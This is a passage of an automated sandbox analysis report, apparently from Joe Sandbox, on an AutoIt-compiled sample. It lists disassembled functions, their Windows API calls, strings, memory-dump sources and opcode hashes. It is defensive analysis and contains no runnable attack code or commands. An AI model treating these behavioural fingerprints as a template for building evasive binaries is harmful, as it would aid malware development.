                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0052DD95
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0052DDA9
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0052DDDB
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0052DDFC
                                                                                                                      • _wcscpy.LIBCMT ref: 0052DE08
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0052DE47
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 3566783562-438819550
                                                                                                                      • Opcode ID: f009a3dbf1b69775ee526aff6065a218324f3deb9902d17dd91653415bd5fcef
                                                                                                                      • Instruction ID: 6e75a8c18274454367bb46f4a9b53ccf9bc6af12c63839325c00730c9af31032
                                                                                                                      • Opcode Fuzzy Hash: f009a3dbf1b69775ee526aff6065a218324f3deb9902d17dd91653415bd5fcef
                                                                                                                      • Instruction Fuzzy Hash: 2C618C76104215AFCB10EF21D844EAEB7F8BF8A314F04481EF98997291DB35ED45CBA2
                                                                                                                      Function 00529C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00529C7F
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00529CA0
                                                                                                                      • __swprintf.LIBCMT ref: 00529CF9
                                                                                                                      • __swprintf.LIBCMT ref: 00529D12
                                                                                                                      • _wprintf.LIBCMT ref: 00529DB9
                                                                                                                      • _wprintf.LIBCMT ref: 00529DD7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                      • API String ID: 311963372-3080491070
                                                                                                                      • Opcode ID: 195eb91de93de5cb4399a3dd6b16ac2d29fe603b8ebfc242d33112f3b87b2ec4
                                                                                                                      • Instruction ID: 134d16f6fa918f1243f137a9b37ec1b58c6c597cf7070c29f9eeb35ab349c23a
                                                                                                                      • Opcode Fuzzy Hash: 195eb91de93de5cb4399a3dd6b16ac2d29fe603b8ebfc242d33112f3b87b2ec4
                                                                                                                      • Instruction Fuzzy Hash: 5B51A17590050AABCF15EBE1DD46EEEBB78BF14304F50406AB509721A1EB352E48DF64
                                                                                                                      Function 0052A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
                                                                                                                        • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0052A3CB
                                                                                                                      • GetDriveTypeW.KERNEL32 ref: 0052A418
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0052A460
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0052A497
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0052A4C5
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                      • API String ID: 2698844021-4113822522
                                                                                                                      • Opcode ID: df137467492994410f28dec4ffc834a7475f4a300b6d2c7df7584f938335a4b8
                                                                                                                      • Instruction ID: dd2ad43b8d5e27c7cc9c3196c64935e93c88b3e8263827aa35f36501eb33826c
                                                                                                                      • Opcode Fuzzy Hash: df137467492994410f28dec4ffc834a7475f4a300b6d2c7df7584f938335a4b8
                                                                                                                      • Instruction Fuzzy Hash: 0B518B751043049FC740EF11D885D6ABBE4FF99718F00886EF89A972A1DB35ED0ACB96
                                                                                                                      Function 0051F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,004FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0051F8DF
                                                                                                                      • LoadStringW.USER32(00000000,?,004FE029,00000001), ref: 0051F8E8
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,004FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0051F90A
                                                                                                                      • LoadStringW.USER32(00000000,?,004FE029,00000001), ref: 0051F90D
                                                                                                                      • __swprintf.LIBCMT ref: 0051F95D
                                                                                                                      • __swprintf.LIBCMT ref: 0051F96E
                                                                                                                      • _wprintf.LIBCMT ref: 0051FA17
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0051FA2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                      • API String ID: 984253442-2268648507
                                                                                                                      • Opcode ID: c425a0e3991ce9defd4a7464fc982ee697bbc3ee0d15507fbdd29bc28c2ef0d2
                                                                                                                      • Instruction ID: f3e9cbe41f1da63fd6251e9dbe71b5359f555fc432122c9e93ba70c1f68e200c
                                                                                                                      • Opcode Fuzzy Hash: c425a0e3991ce9defd4a7464fc982ee697bbc3ee0d15507fbdd29bc28c2ef0d2
                                                                                                                      • Instruction Fuzzy Hash: A7414176900109ABCB05FBE1DD4AEFE7B78AF54315F50006EB50572092EA396F49CF64
                                                                                                                      Function 0054BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00549207,?,?), ref: 0054BA56
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00549207,?,?,00000000,?), ref: 0054BA6D
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00549207,?,?,00000000,?), ref: 0054BA78
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00549207,?,?,00000000,?), ref: 0054BA85
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0054BA8E
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00549207,?,?,00000000,?), ref: 0054BA9D
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0054BAA6
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00549207,?,?,00000000,?), ref: 0054BAAD
                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00549207,?,?,00000000,?), ref: 0054BABE
                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00552CAC,?), ref: 0054BAD7
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0054BAE7
                                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0054BB0B
                                                                                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0054BB36
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0054BB5E
                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0054BB74
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3840717409-0
                                                                                                                      • Opcode ID: 2954f039920efac30ce5e7fe4cf8f5cbab6cd4adf448c8d370e5eae7868f2cca
                                                                                                                      • Instruction ID: 05d07333f69194121b02cea03e1c9cb16b3a702835c1bac7a239027d2ee47b4c
                                                                                                                      • Opcode Fuzzy Hash: 2954f039920efac30ce5e7fe4cf8f5cbab6cd4adf448c8d370e5eae7868f2cca
                                                                                                                      • Instruction Fuzzy Hash: 1E410879600204AFDB119F69DC88EEB7BB8FB9A719F104068F945D7260D7709905EB60
                                                                                                                      Function 0052D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __wsplitpath.LIBCMT ref: 0052DA10
                                                                                                                      • _wcscat.LIBCMT ref: 0052DA28
                                                                                                                      • _wcscat.LIBCMT ref: 0052DA3A
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0052DA4F
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0052DA63
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0052DA7B
                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0052DA95
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0052DAA7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 34673085-438819550
                                                                                                                      • Opcode ID: 98eb0d177372752eea5774209534c86aa38d9f6921bb94e1cef2255f4b8c79d3
                                                                                                                      • Instruction ID: 9b97104a14054da242e6b661c09b9eb8f499c09351f78c3b124afbe1f2727546
                                                                                                                      • Opcode Fuzzy Hash: 98eb0d177372752eea5774209534c86aa38d9f6921bb94e1cef2255f4b8c79d3
                                                                                                                      • Instruction Fuzzy Hash: 128182715082519FCB64EF65D844AAABBF4BF8A314F144C2EF889C7291E734DD84CB62
                                                                                                                      Function 0054C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0054C1FC
                                                                                                                      • GetFocus.USER32 ref: 0054C20C
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 0054C217
                                                                                                                      • _memset.LIBCMT ref: 0054C342
                                                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0054C36D
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 0054C38D
                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0054C3A0
                                                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0054C3D4
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0054C41C
                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0054C454
                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0054C489
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1296962147-4108050209
                                                                                                                      • Opcode ID: 5bde84774f161434132025e061674d97b3d8ce1e7417d3183e7910655d059ffb
                                                                                                                      • Instruction ID: f6b9d822d06f7a3d8a27013cbf3fd4c29f5cb0cd9aafcf873cabe7770c1cfda5
                                                                                                                      • Opcode Fuzzy Hash: 5bde84774f161434132025e061674d97b3d8ce1e7417d3183e7910655d059ffb
                                                                                                                      • Instruction Fuzzy Hash: C9819D7460A301AFDB50DF14C994AABBFE8FBC8718F00492EF99597291D7B0D904DB62
                                                                                                                      Function 0053731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 0053738F
                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0053739B
                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 005373A7
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 005373B4
                                                                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00537408
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00537444
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00537468
                                                                                                                      • SelectObject.GDI32(00000006,?), ref: 00537470
                                                                                                                      • DeleteObject.GDI32(?), ref: 00537479
                                                                                                                      • DeleteDC.GDI32(00000006), ref: 00537480
                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0053748B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                      • Opcode ID: ed0568d168760784c7fa7fa9c5b8d231fef82216fe7da29052082134532e5d36
                                                                                                                      • Instruction ID: 2ccae8cb4eedc84855201c6ac09c258af93b25adadede900188e5b46f87e46d6
                                                                                                                      • Opcode Fuzzy Hash: ed0568d168760784c7fa7fa9c5b8d231fef82216fe7da29052082134532e5d36
                                                                                                                      • Instruction Fuzzy Hash: 66513BB5904209EFCB24CFA9CC89EAEBBB9FF49310F14842DF95A97211C771A944DB50
                                                                                                                      Function 004C6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004E0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,004C6B0C,?,00008000), ref: 004E0973
                                                                                                                        • Part of subcall function 004C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004C4743,?,?,004C37AE,?), ref: 004C4770
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 004C6BAD
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004C6CFA
                                                                                                                        • Part of subcall function 004C586D: _wcscpy.LIBCMT ref: 004C58A5
                                                                                                                        • Part of subcall function 004E363D: _iswctype.LIBCMT ref: 004E3645
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                      • API String ID: 537147316-1018226102
                                                                                                                      • Opcode ID: 4074c7a30a721a11aaa3f51c71995b544f1f029b821a80f9e30a4d916c8c40c5
                                                                                                                      • Instruction ID: 03d37a4910c876b7b87bd460d0735a8c6a6bacc4b2291dfd8483d3373e4435e3
                                                                                                                      • Opcode Fuzzy Hash: 4074c7a30a721a11aaa3f51c71995b544f1f029b821a80f9e30a4d916c8c40c5
                                                                                                                      • Instruction Fuzzy Hash: 09029D341083459FC750EF25C881EAFBBE5BF95318F00481EF586972A1DB38E989CB5A
                                                                                                                      Function 00522D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00522D50
                                                                                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00522DDD
                                                                                                                      • GetMenuItemCount.USER32(00585890), ref: 00522E66
                                                                                                                      • DeleteMenu.USER32(00585890,00000005,00000000,000000F5,?,?), ref: 00522EF6
                                                                                                                      • DeleteMenu.USER32(00585890,00000004,00000000), ref: 00522EFE
                                                                                                                      • DeleteMenu.USER32(00585890,00000006,00000000), ref: 00522F06
                                                                                                                      • DeleteMenu.USER32(00585890,00000003,00000000), ref: 00522F0E
                                                                                                                      • GetMenuItemCount.USER32(00585890), ref: 00522F16
                                                                                                                      • SetMenuItemInfoW.USER32(00585890,00000004,00000000,00000030), ref: 00522F4C
                                                                                                                      • GetCursorPos.USER32(?), ref: 00522F56
                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00522F5F
                                                                                                                      • TrackPopupMenuEx.USER32(00585890,00000000,?,00000000,00000000,00000000), ref: 00522F72
                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00522F7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3993528054-0
                                                                                                                      • Opcode ID: 88d27087d7d402927feaa9a22668010d051fc26a330f80a54a6474c0157542b9
                                                                                                                      • Instruction ID: 583b80d94ac332c793f0e919dcb4496cbcb4e76d00d77dd5920a26c1d1dd4977
                                                                                                                      • Opcode Fuzzy Hash: 88d27087d7d402927feaa9a22668010d051fc26a330f80a54a6474c0157542b9
                                                                                                                      • Instruction Fuzzy Hash: 14712B78600225BFEB218F55EC89FEABF68FF46314F140216F615AA1E0C7B15C20EB51
                                                                                                                      Function 005388AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 005388D7
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00538904
                                                                                                                      • CoUninitialize.OLE32 ref: 0053890E
                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00538A0E
                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00538B3B
                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00552C0C), ref: 00538B6F
                                                                                                                      • CoGetObject.OLE32(?,00000000,00552C0C,?), ref: 00538B92
                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00538BA5
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00538C25
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00538C35
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                      • String ID: ,,U
                                                                                                                      • API String ID: 2395222682-3961956419
                                                                                                                      • Opcode ID: c376c92915b2c1f82ca8b1afbaa08f041cb81dea3155e0fb9b9e888cee912da4
                                                                                                                      • Instruction ID: 5c2f423f4fadec132ae029b2810adaddcc8b34a71a10a78a580d86b832658db6
                                                                                                                      • Opcode Fuzzy Hash: c376c92915b2c1f82ca8b1afbaa08f041cb81dea3155e0fb9b9e888cee912da4
                                                                                                                      • Instruction Fuzzy Hash: FAC135B1608305AFD704DF68C884A6BBBE9FF89348F00495DF98A9B251DB71ED05CB52
                                                                                                                      Function 005177DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                      • _memset.LIBCMT ref: 0051786B
                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005178A0
